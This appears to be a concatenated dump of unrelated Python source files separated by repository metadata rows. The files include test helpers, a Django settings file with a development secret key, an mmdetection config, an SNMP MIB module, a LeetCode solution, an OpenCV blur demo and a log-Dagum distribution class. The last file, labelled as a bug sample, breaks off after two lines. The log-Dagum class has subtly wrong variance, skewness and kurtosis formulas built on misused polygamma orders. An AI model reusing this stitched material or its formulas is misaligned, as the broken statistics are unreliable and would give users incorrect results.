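# Illustrative usage (added; the logger name and file name are assumptions):
#
#     import logging
#     setup_test_logging(logging.getLogger('test_example'), 'DEBUG', 'test_example.log')
#
# writes test logs to test_example.log and, if the STREAM_LOG environment
# variable is set, mirrors them to stdout as well.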
class _AssertNoLogsContext(unittest.case._AssertLogsContext):
"""A context manager used to implement TestCase.assertNoLogs()."""
# pylint: disable=inconsistent-return-statements
def __exit__(self, exc_type, exc_value, tb):
"""
This is a modified version of TestCase._AssertLogsContext.__exit__(...)
"""
self.logger.handlers = self.old_handlers
self.logger.propagate = self.old_propagate
self.logger.setLevel(self.old_level)
if exc_type is not None:
# let unexpected exceptions pass through
return False
if self.watcher.records:
msg = 'logs of level {} or higher triggered on {}:\n'.format(
logging.getLevelName(self.level), self.logger.name)
for record in self.watcher.records:
msg += 'logger %s %s:%i: %s\n' % (record.name, record.pathname,
record.lineno,
record.getMessage())
self._raiseFailure(msg)
class Case(dict):
"""<no description>"""
pass
def generate_cases(docstring, dsc=None, name=None, **kwargs):
"""Combines kwargs in cartesian product and creates Case with them"""
ret = []
keys = kwargs.keys()
vals = kwargs.values()
for values in product(*vals):
case = Case(zip(keys, values))
if docstring is not None:
setattr(case, "__doc__", docstring.format(**case))
if dsc is not None:
setattr(case, "__doc__", dsc.format(**case))
if name is not None:
setattr(case, "__name__", name.format(**case))
ret.append(case)
return ret
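# Illustrative usage (added; the parameter names are hypothetical): the call below
# would build six Case dicts covering the Cartesian product of the keyword
# arguments, naming each generated case.
#
#     cases = generate_cases(docstring=None,
#                            name='test_{n}_qubits_{shots}_shots',
#                            n=[1, 2, 3],
#                            shots=[100, 1000])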
|
[
"[email protected]"
] | |
c27e540e1dee4537be8ca6378dc757a16a9ff8d0
|
801510e45d9aebe5c5b8b09a3ce4453a3a11a3ca
|
/django/full_stack_django/amadon/amadon/settings.py
|
c8a2b95ae4b1da6df15ff14bd3426de162c50844
|
[] |
no_license
|
michelleshan/coding_dojo_python_course
|
5581ebca0a645ba7231a2da2d2d64d6c3735bfc4
|
e20e8195950004ef0aa09e6b0f84e7f05bd355e8
|
refs/heads/master
| 2022-11-21T01:34:54.309175 | 2020-07-16T03:29:45 | 2020-07-16T03:29:45 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,103 |
py
|
"""
Django settings for amadon project.
Generated by 'django-admin startproject' using Django 2.2.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '^y#+bl%#tl6dws0l$moo_3o-su_^kjym5l*x!+!dlrhvv#m$+h'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'amadon_app'
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'amadon.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'amadon.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
|
[
"[email protected]"
] | |
261a0e0bb3133e20df3e76e1fdd109448d018b8c
|
9ef7093ffa3bbb916e197ba6788aa3c13dc034dd
|
/configs/underwaterdataset/reppoints_moment_r50_fpn_2x_mt.py
|
a03ed5bd5954ecf0b1fa1cdec5e5f447f67c00c3
|
[
"Apache-2.0"
] |
permissive
|
coldsummerday/mmdetection-zhou
|
aae3b50ecddf227f0802c2e5b51622168714fab5
|
c333f06f4ffb22131a6f30e6468c82b926e5c87f
|
refs/heads/master
| 2020-12-10T07:34:49.813269 | 2020-03-10T08:52:10 | 2020-03-10T08:52:10 | 233,536,042 | 4 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,428 |
py
|
# model settings
norm_cfg = dict(type='GN', num_groups=32, requires_grad=True)
model = dict(
type='RepPointsDetector',
pretrained='torchvision://resnet50',
backbone=dict(
type='ResNet',
depth=50,
num_stages=4,
out_indices=(0, 1, 2, 3),
frozen_stages=1,
style='pytorch'),
neck=dict(
type='FPN',
in_channels=[256, 512, 1024, 2048],
out_channels=256,
start_level=1,
add_extra_convs=True,
num_outs=5,
norm_cfg=norm_cfg),
bbox_head=dict(
type='RepPointsHead',
num_classes=5,
in_channels=256,
feat_channels=256,
point_feat_channels=256,
stacked_convs=3,
num_points=9,
gradient_mul=0.1,
point_strides=[8, 16, 32, 64, 128],
point_base_scale=4,
norm_cfg=norm_cfg,
loss_cls=dict(
type='FocalLoss',
use_sigmoid=True,
gamma=2.0,
alpha=0.25,
loss_weight=1.0),
loss_bbox_init=dict(type='SmoothL1Loss', beta=0.11, loss_weight=0.5),
loss_bbox_refine=dict(type='SmoothL1Loss', beta=0.11, loss_weight=1.0),
transform_method='moment'))
# training and testing settings
train_cfg = dict(
init=dict(
assigner=dict(type='PointAssigner', scale=4, pos_num=1),
allowed_border=-1,
pos_weight=-1,
debug=False),
refine=dict(
assigner=dict(
type='MaxIoUAssigner',
pos_iou_thr=0.5,
neg_iou_thr=0.4,
min_pos_iou=0,
ignore_iof_thr=-1),
allowed_border=-1,
pos_weight=-1,
debug=False))
test_cfg = dict(
nms_pre=1000,
min_bbox_size=0,
score_thr=0.05,
nms=dict(type='nms', iou_thr=0.5),
max_per_img=100)
# dataset settings
dataset_type = 'UnderWaterDataset'
data_root = '/home/ices18/data/underwaterobjectdetection/'
img_norm_cfg = dict(
mean=[123.675, 116.28, 103.53], std=[58.395, 57.12, 57.375], to_rgb=True)
train_pipeline = [
dict(type='LoadImageFromFile'),
dict(type='LoadAnnotations', with_bbox=True),
dict(
type='Resize',
img_scale=[(1333, 480), (1333, 960)],
keep_ratio=True,
multiscale_mode='range'),
dict(type='RandomFlip', flip_ratio=0.5),
dict(type='Normalize', **img_norm_cfg),
dict(type='Pad', size_divisor=32),
dict(type='DefaultFormatBundle'),
dict(type='Collect', keys=['img', 'gt_bboxes', 'gt_labels']),
]
test_pipeline = [
dict(type='LoadImageFromFile'),
dict(
type='MultiScaleFlipAug',
img_scale=(1333, 800),
flip=False,
transforms=[
dict(type='Resize', keep_ratio=True),
dict(type='RandomFlip'),
dict(type='Normalize', **img_norm_cfg),
dict(type='Pad', size_divisor=32),
dict(type='ImageToTensor', keys=['img']),
dict(type='Collect', keys=['img']),
])
]
data = dict(
imgs_per_gpu=4,
workers_per_gpu=2,
train=dict(
type=dataset_type,
data_root = data_root,
ann_file=data_root + 'trainannotation.pkl',
img_prefix=data_root + 'train/image/',
pipeline=train_pipeline),
val=dict(
type=dataset_type,
data_root = data_root,
ann_file=data_root + 'trainannotation.pkl',
img_prefix=data_root + 'train/image/',
pipeline=test_pipeline),
test=dict(
type=dataset_type,
data_root = data_root,
ann_file=data_root + 'trainannotation.pkl',
img_prefix=data_root + 'train/image/',
pipeline=test_pipeline))
evaluation = dict(interval=1, metric='bbox')
# optimizer
optimizer = dict(type='SGD', lr=0.0025, momentum=0.9, weight_decay=0.0001)
optimizer_config = dict(grad_clip=dict(max_norm=35, norm_type=2))
# learning policy
lr_config = dict(
policy='step',
warmup='linear',
warmup_iters=500,
warmup_ratio=1.0 / 3,
step=[16, 22])
checkpoint_config = dict(interval=1)
# yapf:disable
log_config = dict(
interval=50,
hooks=[
dict(type='TextLoggerHook'),
# dict(type='TensorboardLoggerHook')
])
# yapf:enable
# runtime settings
total_epochs = 24
dist_params = dict(backend='nccl')
log_level = 'INFO'
work_dir = './work_dirs/reppoints_moment_r50_fpn_2x_mt'
load_from = None
resume_from = None
auto_resume = True
workflow = [('train', 1)]
|
[
"[email protected]"
] | |
0c808994fa59f2de1512003d66c1b90c255c8e86
|
147648c6b25ecc33e82a36b36de6623df9340e62
|
/examples/docs_snippets/docs_snippets/legacy/dagster_pandas_guide/shape_constrained_trip.py
|
919727954440fecaff0a49b7ac4c1ac7266f5a30
|
[
"Apache-2.0"
] |
permissive
|
asdlei99/dagster
|
be81009ff00dbad02f7cec974650388a5cc2af59
|
bbfd1a22e85a10881d7dbbcc888957a487f0c3e5
|
refs/heads/master
| 2023-08-28T07:18:23.838943 | 2021-11-08T23:09:07 | 2021-11-08T23:09:07 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 820 |
py
|
from datetime import datetime
from dagster import Out, job, op
from dagster.utils import script_relative_path
from dagster_pandas import RowCountConstraint, create_dagster_pandas_dataframe_type
from pandas import DataFrame, read_csv
# start_create_type
ShapeConstrainedTripDataFrame = create_dagster_pandas_dataframe_type(
name="ShapeConstrainedTripDataFrame", dataframe_constraints=[RowCountConstraint(4)]
)
# end_create_type
@op(out=Out(ShapeConstrainedTripDataFrame))
def load_shape_constrained_trip_dataframe() -> DataFrame:
return read_csv(
script_relative_path("./ebike_trips.csv"),
parse_dates=["start_time", "end_time"],
date_parser=lambda x: datetime.strptime(x, "%Y-%m-%d %H:%M:%S.%f"),
)
@job
def shape_constrained_trip():
load_shape_constrained_trip_dataframe()
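# Example invocation (added for illustration; assumes ebike_trips.csv sits next
# to this file, as script_relative_path above expects):
#
#     if __name__ == "__main__":
#         result = shape_constrained_trip.execute_in_process()
#         assert result.success
#
# execute_in_process() runs the job in the current process, which is a quick way
# to exercise the RowCountConstraint(4) attached to the dataframe type.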
|
[
"[email protected]"
] | |
f91c21338397820c8cb715e928035e1704768951
|
85a9ffeccb64f6159adbd164ff98edf4ac315e33
|
/pysnmp/ADTRAN-ATLAS-VOICE-MIB.py
|
4b219ec7f7721d37628adad553700cd8f6071463
|
[
"Apache-2.0"
] |
permissive
|
agustinhenze/mibs.snmplabs.com
|
5d7d5d4da84424c5f5a1ed2752f5043ae00019fb
|
1fc5c07860542b89212f4c8ab807057d9a9206c7
|
refs/heads/master
| 2020-12-26T12:41:41.132395 | 2019-08-16T15:51:41 | 2019-08-16T15:53:57 | 237,512,469 | 0 | 0 |
Apache-2.0
| 2020-01-31T20:41:36 | 2020-01-31T20:41:35 | null |
UTF-8
|
Python
| false | false | 7,407 |
py
|
#
# PySNMP MIB module ADTRAN-ATLAS-VOICE-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/ADTRAN-ATLAS-VOICE-MIB
# Produced by pysmi-0.3.4 at Mon Apr 29 16:59:20 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
ObjectIdentifier, Integer, OctetString = mibBuilder.importSymbols("ASN1", "ObjectIdentifier", "Integer", "OctetString")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ConstraintsUnion, ValueSizeConstraint, ConstraintsIntersection, SingleValueConstraint, ValueRangeConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "ConstraintsUnion", "ValueSizeConstraint", "ConstraintsIntersection", "SingleValueConstraint", "ValueRangeConstraint")
ModuleCompliance, NotificationGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ModuleCompliance", "NotificationGroup")
Integer32, iso, NotificationType, IpAddress, MibScalar, MibTable, MibTableRow, MibTableColumn, enterprises, TimeTicks, Counter32, MibIdentifier, ObjectIdentity, Counter64, Unsigned32, Bits, Gauge32, ModuleIdentity = mibBuilder.importSymbols("SNMPv2-SMI", "Integer32", "iso", "NotificationType", "IpAddress", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "enterprises", "TimeTicks", "Counter32", "MibIdentifier", "ObjectIdentity", "Counter64", "Unsigned32", "Bits", "Gauge32", "ModuleIdentity")
DisplayString, TextualConvention = mibBuilder.importSymbols("SNMPv2-TC", "DisplayString", "TextualConvention")
adtran = MibIdentifier((1, 3, 6, 1, 4, 1, 664))
adMgmt = MibIdentifier((1, 3, 6, 1, 4, 1, 664, 2))
adATLASmg = MibIdentifier((1, 3, 6, 1, 4, 1, 664, 2, 154))
adGenATLASmg = MibIdentifier((1, 3, 6, 1, 4, 1, 664, 2, 154, 1))
adATLASVoicemg = MibIdentifier((1, 3, 6, 1, 4, 1, 664, 2, 154, 1, 10))
adATLASVoiceIfNumber = MibScalar((1, 3, 6, 1, 4, 1, 664, 2, 154, 1, 10, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: adATLASVoiceIfNumber.setStatus('mandatory')
adATLASVoiceIfTable = MibTable((1, 3, 6, 1, 4, 1, 664, 2, 154, 1, 10, 2), )
if mibBuilder.loadTexts: adATLASVoiceIfTable.setStatus('mandatory')
adATLASVoiceIfEntry = MibTableRow((1, 3, 6, 1, 4, 1, 664, 2, 154, 1, 10, 2, 1), ).setIndexNames((0, "ADTRAN-ATLAS-VOICE-MIB", "adATLASVoiceIfIndex"))
if mibBuilder.loadTexts: adATLASVoiceIfEntry.setStatus('mandatory')
adATLASVoiceIfIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 664, 2, 154, 1, 10, 2, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: adATLASVoiceIfIndex.setStatus('mandatory')
adATLASVoiceIfSlotNum = MibTableColumn((1, 3, 6, 1, 4, 1, 664, 2, 154, 1, 10, 2, 1, 2), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: adATLASVoiceIfSlotNum.setStatus('mandatory')
adATLASVoiceIfPortNum = MibTableColumn((1, 3, 6, 1, 4, 1, 664, 2, 154, 1, 10, 2, 1, 3), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: adATLASVoiceIfPortNum.setStatus('mandatory')
adATLASVoiceIfPortStat = MibTableColumn((1, 3, 6, 1, 4, 1, 664, 2, 154, 1, 10, 2, 1, 4), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24))).clone(namedValues=NamedValues(("inactive", 1), ("disabled", 2), ("idle", 3), ("test", 4), ("tipOpen", 5), ("offhook", 6), ("reverseBattery", 7), ("testActive", 8), ("testOffhook", 9), ("testRevBatt", 10), ("testRinging", 11), ("testTipOpen", 12), ("testTipOpenRingGND", 13), ("testDisabled", 14), ("testRingOffhook", 15), ("testLO", 16), ("testLCNormTRPolarity", 17), ("testLCNoBatt", 18), ("testLCRevTRPolarity", 19), ("testRingGND", 20), ("transOnly", 21), ("testELeadOpen", 22), ("testELeadClosed", 23), ("callInProgress", 24)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: adATLASVoiceIfPortStat.setStatus('mandatory')
adATLASVoiceIfTxSignalBits = MibTableColumn((1, 3, 6, 1, 4, 1, 664, 2, 154, 1, 10, 2, 1, 5), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(4, 4)).setFixedLength(4)).setMaxAccess("readonly")
if mibBuilder.loadTexts: adATLASVoiceIfTxSignalBits.setStatus('mandatory')
adATLASVoiceIfRxSignalBits = MibTableColumn((1, 3, 6, 1, 4, 1, 664, 2, 154, 1, 10, 2, 1, 6), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(4, 4)).setFixedLength(4)).setMaxAccess("readonly")
if mibBuilder.loadTexts: adATLASVoiceIfRxSignalBits.setStatus('mandatory')
adATLASVoiceTstTable = MibTable((1, 3, 6, 1, 4, 1, 664, 2, 154, 1, 10, 3), )
if mibBuilder.loadTexts: adATLASVoiceTstTable.setStatus('mandatory')
adATLASVoiceTstEntry = MibTableRow((1, 3, 6, 1, 4, 1, 664, 2, 154, 1, 10, 3, 1), ).setIndexNames((0, "ADTRAN-ATLAS-VOICE-MIB", "adATLASVoiceTstIndex"))
if mibBuilder.loadTexts: adATLASVoiceTstEntry.setStatus('mandatory')
adATLASVoiceTstIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 664, 2, 154, 1, 10, 3, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: adATLASVoiceTstIndex.setStatus('mandatory')
adATLASVoiceTst2W = MibTableColumn((1, 3, 6, 1, 4, 1, 664, 2, 154, 1, 10, 3, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11))).clone(namedValues=NamedValues(("off", 1), ("loopOpen", 2), ("loopClosed", 3), ("ringGround", 4), ("active", 5), ("tipOpen", 6), ("reverseBattery", 7), ("disable", 8), ("ringing", 9), ("eLeadOpen", 10), ("eLeadClosed", 11)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: adATLASVoiceTst2W.setStatus('mandatory')
adATLASVoiceTstTxABCD = MibTableColumn((1, 3, 6, 1, 4, 1, 664, 2, 154, 1, 10, 3, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5))).clone(namedValues=NamedValues(("txOff", 1), ("tx0000", 2), ("tx0101", 3), ("tx1010", 4), ("tx1111", 5)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: adATLASVoiceTstTxABCD.setStatus('mandatory')
adATLASVoiceTst1kHzTone = MibTableColumn((1, 3, 6, 1, 4, 1, 664, 2, 154, 1, 10, 3, 1, 4), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("off", 1), ("near", 2), ("far", 3)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: adATLASVoiceTst1kHzTone.setStatus('mandatory')
adATLASVoiceTstLpBk = MibTableColumn((1, 3, 6, 1, 4, 1, 664, 2, 154, 1, 10, 3, 1, 5), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("off", 1), ("analog", 2), ("digital", 3)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: adATLASVoiceTstLpBk.setStatus('mandatory')
mibBuilder.exportSymbols("ADTRAN-ATLAS-VOICE-MIB", adATLASVoiceIfNumber=adATLASVoiceIfNumber, adATLASVoiceIfPortStat=adATLASVoiceIfPortStat, adATLASVoiceTst2W=adATLASVoiceTst2W, adATLASVoiceIfTxSignalBits=adATLASVoiceIfTxSignalBits, adATLASVoiceIfSlotNum=adATLASVoiceIfSlotNum, adMgmt=adMgmt, adATLASmg=adATLASmg, adATLASVoiceTstEntry=adATLASVoiceTstEntry, adATLASVoiceIfEntry=adATLASVoiceIfEntry, adATLASVoicemg=adATLASVoicemg, adATLASVoiceIfTable=adATLASVoiceIfTable, adATLASVoiceIfPortNum=adATLASVoiceIfPortNum, adATLASVoiceTstLpBk=adATLASVoiceTstLpBk, adGenATLASmg=adGenATLASmg, adATLASVoiceTstIndex=adATLASVoiceTstIndex, adtran=adtran, adATLASVoiceTstTable=adATLASVoiceTstTable, adATLASVoiceTst1kHzTone=adATLASVoiceTst1kHzTone, adATLASVoiceIfIndex=adATLASVoiceIfIndex, adATLASVoiceIfRxSignalBits=adATLASVoiceIfRxSignalBits, adATLASVoiceTstTxABCD=adATLASVoiceTstTxABCD)
|
[
"[email protected]"
] | |
02f6ddcfd40e620fba1b316addc8157b0fccbf16
|
8a74a679fd53fa909d4cc7221d477ce21a1c3566
|
/PYTHON/remove_duplicates.py
|
e5dae22358ca2965e82c5cf9443a3104ca841f0f
|
[
"MIT"
] |
permissive
|
pawarspeaks/HACKTOBERFEST2021-2
|
1082245d10d1bd76a4b9900223e701ab95b881e8
|
1b53ba18b78d489c2b13d331d70e35e8a8566e93
|
refs/heads/main
| 2023-09-01T11:11:05.310810 | 2021-10-30T16:20:42 | 2021-10-30T16:20:42 | 422,931,347 | 4 | 0 |
MIT
| 2021-10-30T16:20:06 | 2021-10-30T16:20:05 | null |
UTF-8
|
Python
| false | false | 599 |
py
|
# Question Link : https://leetcode.com/problems/remove-duplicates-from-sorted-list/
class Solution:
def deleteDuplicates(self, head: Optional[ListNode]) -> Optional[ListNode]:
        # Walk the sorted list once, unlinking nodes whose value repeats
        # the most recently kept value.
        prev = head
        current = head  # keep a handle on the original head to return
        if head:
            val = head.val
            head = head.next
        while head is not None:
            if head.val == val:
                # Duplicate: unlink it by pointing the last kept node past it.
                prev.next = head.next
                head = head.next
            else:
                # New value: remember it and advance the last-kept pointer.
                val = head.val
                prev = head
                head = head.next
        return current
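# Quick local check (added; LeetCode normally supplies the ListNode class):
#
#     class ListNode:
#         def __init__(self, val=0, next=None):
#             self.val, self.next = val, next
#
#     head = ListNode(1, ListNode(1, ListNode(2)))
#     deduped = Solution().deleteDuplicates(head)   # 1 -> 2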
|
[
"[email protected]"
] | |
05877846d04c4a9261d06974e881b4c047c5ef65
|
ee4d59c295d3060077f5dc3e35aaf0458b31eb32
|
/Main/VideoFilter/ConvolutionFiltering/BlurAvgApi.py
|
95c97dd9fbeae3b5295c9e3a2bc9194bb5231df4
|
[] |
no_license
|
GeonwooVincentKim/Python_OpenCV_MiniProject
|
eb82f9102352f0fc809c05eeaddbceffaf4e1313
|
c59f99ba74a07e6b2b442bf95b90f041f42d2521
|
refs/heads/master
| 2023-04-22T14:33:41.219214 | 2021-04-20T12:18:34 | 2021-04-20T12:18:34 | 298,581,249 | 2 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 282 |
py
|
import cv2
import numpy as np
file_name = '../../../img/taekwonv1.jpg'
img = cv2.imread(file_name)
blur1 = cv2.blur(img, (10, 10))
blur2 = cv2.boxFilter(img, -1, (10, 10))
merged = np.hstack((img, blur1, blur2))
cv2.imshow('blur', merged)
cv2.waitKey(0)
cv2.destroyAllWindows()
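# Note (added): cv2.blur(img, k) is the normalized box filter, so it matches
# cv2.boxFilter(img, -1, k) with the default normalize=True, and also
# cv2.filter2D(img, -1, np.ones((10, 10), np.float32) / 100) built by hand;
# that is why the two blurred panels in the merged image look identical.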
|
[
"[email protected]"
] | |
7f93cd2bf483be0a0bf39ca8ca709c19d84c5988
|
3b504a983f1807ae7c5af51078bfab8c187fc82d
|
/client/gui/HUD2/features/BattleReplay/BattleReplayModel.py
|
d21709f49d792212b7e0c0469bd4dca973d7509b
|
[] |
no_license
|
SEA-group/wowp_scripts
|
7d35fd213db95ea6b3dbd1ec6d3e0f13de86ba58
|
2fe54a44df34f2dcaa6860a23b835dcd8dd21402
|
refs/heads/master
| 2021-09-07T23:10:13.706605 | 2018-03-02T17:23:48 | 2018-03-02T17:23:48 | 117,280,141 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 649 |
py
|
# Embedded file name: scripts/client/gui/HUD2/features/BattleReplay/BattleReplayModel.py
from gui.HUD2.core.AutoFilledDataModel import AutoFilledDataModel
from gui.HUD2.core.DataModel import Structure, FloatT, BoolT, StringT
from gui.HUD2.features.BattleReplay.BattleReplayController import BattleReplayController
from gui.HUD2.features.BattleReplay.BattleReplaySource import BattleReplaySource
class BattleReplayModel(AutoFilledDataModel):
DATA_SOURCE = BattleReplaySource
CONTROLLER = BattleReplayController
SCHEME = Structure(panelVisibility=BoolT, speed=StringT, isPaused=BoolT, timeMax=FloatT, timeCurrent=FloatT)
source = None
|
[
"[email protected]"
] | |
3f5d45e43c6ad95997e06aaa1425c98108431191
|
5b4c803f68e52849a1c1093aac503efc423ad132
|
/UnPyc/tests/tests/all_opcodes/complex_if2.py
|
195df3f53cd7ccdacfb2f828fa8f20736d4dc093
|
[] |
no_license
|
Prashant-Jonny/UnPyc
|
9ce5d63b1e0d2ec19c1faa48d932cc3f71f8599c
|
4b9d4ab96dfc53a0b4e06972443e1402e9dc034f
|
refs/heads/master
| 2021-01-17T12:03:17.314248 | 2013-02-22T07:22:35 | 2013-02-22T07:22:35 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 47 |
py
|
if not(a == 1 and b == 2):
x = 1
else:
x = 2
|
[
"[email protected]"
] | |
1919b311e39568cc7ff40ef676dad61a16346bb4
|
10e1d1ec2eb7d1ff991d4286006dbbaa5a5e1760
|
/dist/src/dists/logdagum.py
|
4c1d97a901cf2c449eb0e094a7f17cded07d0f12
|
[] |
no_license
|
mudkip201/distributions
|
dd904d462fedf97012ed8057244b0ac496392352
|
dc8b6e3a6b59c1552c9726f760b047eaff3f32ef
|
refs/heads/master
| 2020-11-29T15:23:21.580157 | 2017-11-20T20:40:29 | 2017-11-20T20:40:29 | 87,482,965 | 1 | 0 | null | 2017-07-19T17:11:47 | 2017-04-06T23:06:26 |
Python
|
UTF-8
|
Python
| false | false | 2,121 |
py
|
'''
Created on Jul 18, 2017
@author: matthewcowen-green
'''
import dists.Distribution.Distribution as Distribution
import dists.Distribution as ds
import math
import scipy.special as sp
class logdagum(Distribution):
@staticmethod
def pdf(b,d,l,x):
return b*l*d*math.exp(-d*x)*math.pow(1+l*math.exp(-d*x),-b-1)
@staticmethod
def cdf(b,d,l,x):
return math.pow(1+l*math.exp(-d*x),-b)
@staticmethod
def random(b,d,l):
u=ds.rg0()
return math.log(l/(math.pow(u,-1/b)-1))/d
@staticmethod
def mean(b,d,l):
return (math.log(l)+sp.digamma(b)-sp.digamma(1))/d
@staticmethod
def median(b,d,l):
return math.log(l/(math.pow(1/2,-1/b)-1))/d
@staticmethod
def mode(b,d,l):
if(b*d>1):
return math.log(l*b)/d
return None
@staticmethod
def variance(b,d,l):
return ((sp.polygamma(3,b)+sp.polygamma(3,1))+math.pow(logdagum.mean(b,d,l),2))/math.pow(d,2)-math.pow(logdagum.mean(b,d,l),2)
@staticmethod
def stddev(b,d,l):
return math.sqrt(logdagum.variance(b,d,l))
@staticmethod
def kurtosis(b,d,l):
e1=sp.polygamma(5,b)+sp.polygamma(5,1)
e2=3*(sp.polygamma(3,b)+sp.polygamma(3,1))**2
e3=4*(math.log(l)+sp.digamma(b)-sp.digamma(1))*(sp.polygamma(4,b)-sp.polygamma(4,1))
e4=6*(math.log(l)+sp.digamma(b)-sp.digamma(1))**2*(sp.polygamma(3,b)+sp.polygamma(3,1))
e5=(math.log(l)+sp.digamma(b)-sp.digamma(1))**4
return (e1+e2+e3+e4+e5)/(d**4)/logdagum.variance(b,d,l)**2
@staticmethod
def entropy():
pass
@staticmethod
def skewness(b,d,l):
e1=sp.polygamma(4,b)-sp.polygamma(4,1)
e2=math.pow(math.log(l)+sp.digamma(b)-sp.digamma(1),3)
e3=3*(math.log(l)+sp.digamma(b)-sp.digamma(1))*(sp.polygamma(3,b)+sp.polygamma(3,1))
return ((e1+e2+e3)/(d**3)-3*logdagum.mean(b,d,l)*logdagum.variance(b,d,l)-logdagum.mean(b,d,l)**3)/logdagum.stddev(b,d,l)**3
@staticmethod
def ppf(b,d,l,q):
return math.log(l/(math.pow(q,-1/b)-1))/d
@staticmethod
def mle():
pass
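# Sanity check (added, illustrative): for shape b, rate d and parameter l,
# the cdf evaluated at the median returns 0.5, e.g.
#
#     logdagum.cdf(2.0, 1.5, 1.0, logdagum.median(2.0, 1.5, 1.0))   # ~0.5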
|
[
"[email protected]"
] | |
a528126e75a4f20eaadf3ed8b12152ba16d83163
|
f07a42f652f46106dee4749277d41c302e2b7406
|
/Data Set/bug-fixing-1/92b3d792837f65e6264ce4b4a4fb1459dad94a6e-<main>-bug.py
|
5bbb64f1f31e353b094838ed127dd869876130a3
|
[] |
no_license
|
wsgan001/PyFPattern
|
e0fe06341cc5d51b3ad0fe29b84098d140ed54d1
|
cc347e32745f99c0cd95e79a18ddacc4574d7faa
|
refs/heads/main
| 2023-08-25T23:48:26.112133 | 2021-10-23T14:11:22 | 2021-10-23T14:11:22 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 6,787 |
py
|
def main():
argument_spec = ec2_argument_spec()
